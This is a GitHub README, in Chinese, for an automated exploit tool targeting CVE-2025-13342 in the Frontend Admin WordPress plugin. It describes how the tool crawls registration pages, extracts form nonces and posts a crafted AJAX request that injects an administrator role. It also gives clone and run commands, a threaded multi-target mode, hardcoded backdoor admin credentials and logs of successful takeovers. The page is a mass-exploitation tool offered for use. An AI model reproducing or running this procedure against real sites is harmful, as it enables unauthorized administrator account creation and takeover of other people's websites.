Nxploited/CVE-2025-13342
GitHub: Nxploited/CVE-2025-13342
一款针对 Frontend Admin 插件未认证任意选项更新漏洞的自动化利用工具,可快速创建管理员账户以复现 CVE‑2025‑13342。
Stars: 0 | Forks: 0
# CVE-2025-13342
Frontend Admin by DynamiApps <= 3.28.20 - 未认证任意选项更新
# ⚡ CVE-2025-13342
## Frontend Admin by DynamiApps — 未认证管理员创建
```
__ __ _ _ _ ___ ,________ _
/ ()(| |_// () / )/ \/ )|__ /| __/ __/| |/ )
| | | >- ----/| |/ \----| \ \|__|_/
\___/ \/ \___/ /__\_//__\__/ |\__/\__/ |/__
```
[](https://www.cve.org/CVERecord?id=CVE-2025-13342)
[](https://nvd.nist.gov/)
[](https://wordpress.org/plugins/frontend-admin/)
[]()
[]()
## ◈ 漏洞
| 字段 | 详情 |
|---|---|
| **CVE ID** | CVE-2025-13342 |
| **分数** | **9.8 严重** — `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H` |
| **CNA** | Wordfence |
| **受影响** | Frontend Admin by DynamiApps ≤ **3.28.20** |
| **认证** | **无** — 完全未认证 |
| **类型** | 权限检查不足 + 输入验证 → 任意选项写入 |
| **CWE** | CWE-284 · 不当访问控制 |
**发生情况:**
`ActionOptions::run()` 的保存处理程序在写入 `wp_options` 前既不检查用户权限也不验证输入。一个公开的 ACF 前端表单就成为了开放的写入通道。攻击者设置 `users_can_register=1` 和 `default_role=administrator`,然后注册一个新账户即可自动获得管理员角色。
**此工具跳过两步流程** — 它直接提交经过构造的表单载荷,通过 `acff[user][field_*]` 将 `role=administrator` 注入用户创建字段,在一次 AJAX 调用中创建管理员账户。
## ◈ 漏洞利用原理
```
1. Crawl common registration paths → locate ACF frontend form
2. Parse hidden fields → _acf_nonce, _acf_form
3. Map user fields → username · email · password · role
4. POST /wp-admin/admin-ajax.php
action=frontend_admin/form_submit
acff[user][] = administrator
5. {"success":true} → admin account created
6. Log to acf_success.txt
```
## ◈ 要求
```
requests
beautifulsoup4
colorama
rich
```
```
pip install requests beautifulsoup4 colorama rich
```
## ◈ 安装与运行
```
git clone https://github.com/Nxploited/CVE-2025-13342.git
cd CVE-2025-13342
pip install -r requirements.txt
python3 CVE-2025-13342.py
```
## ◈ 使用
该工具是交互式的。你将被询问四个问题:
```
Targets file path → list.txt
Threads → 10
Timeout (seconds) → 10
Verbose debug → y / N
```
**凭证在内部固定:**
| 字段 | 值 |
|---|---|
| 用户名 | `Nxadmin1` |
| 邮箱 | `nxploitedtest@gmail.com` |
| 密码 | `NxAdmin_1337#KSA` |
## ◈ 目标文件
每行一个主机 — 方案可选:
```
https://target1.com
target2.com
http://target3.com
```
## ◈ 扫描的注册路径
该工具按顺序对每个目标探测 **28 个路径**,直到找到第一个有效的 ACF 表单为止:
```
/ /register/ /registration/ /signup/ /sign-up/
/user-registration/ /account/ /my-account/
/frontend-form/ /frontend-register/ ...
```
## ◈ 输出
| 文件 | 内容 |
|---|---|
| `acf_success.txt` | 确认成功的管理员创建记录 |
**格式:**
```
[2025-06-01 14:30:22] BASE=https://target.com FORM=https://target.com/register/
USER=Nxadmin1 EMAIL=nxploitedtest@gmail.com PASS=NxAdmin_1337#KSA JSON={"success":true,...}
```
**终端:**
```
[+] Target base: https://target.com
[+] Found form at: https://target.com/register/
_acf_nonce: a1b2c3d4e5
_acf_form: 123
[+] SUCCESS: https://target.com
[-] No suitable ACF Frontend form found on ...
[-] FAILED: https://target2.com
```
## ◈ 联系
| | |
|---|---|
| **作者** | Nxploited (Khaled Alenazi) |
| **GitHub** | [github.com/Nxploited](https://github.com/Nxploited) |
| **Telegram** | [@KNxploited](https://t.me/KNxploited) |
## ◈ 免责声明
© 2025 Nxploited · Frontend Admin by DynamiApps ≤ 3.28.20 · Fixed in 3.28.21
标签:ACF前端表单, CRITICAL, CVE-2025-13342, CVSS 9.8, CWE-284, Frontend Admin, OpenVAS, PHP, SQL注入风险, Wordfence, WordPress插件, wp_options写, XSS, 任意选项更新, 前端管理, 动态应用, 未认证访问, 权限绕过, 漏洞情报, 用户注册漏洞, 管理员创建, 角色提升, 输入验证缺失, 逆向工具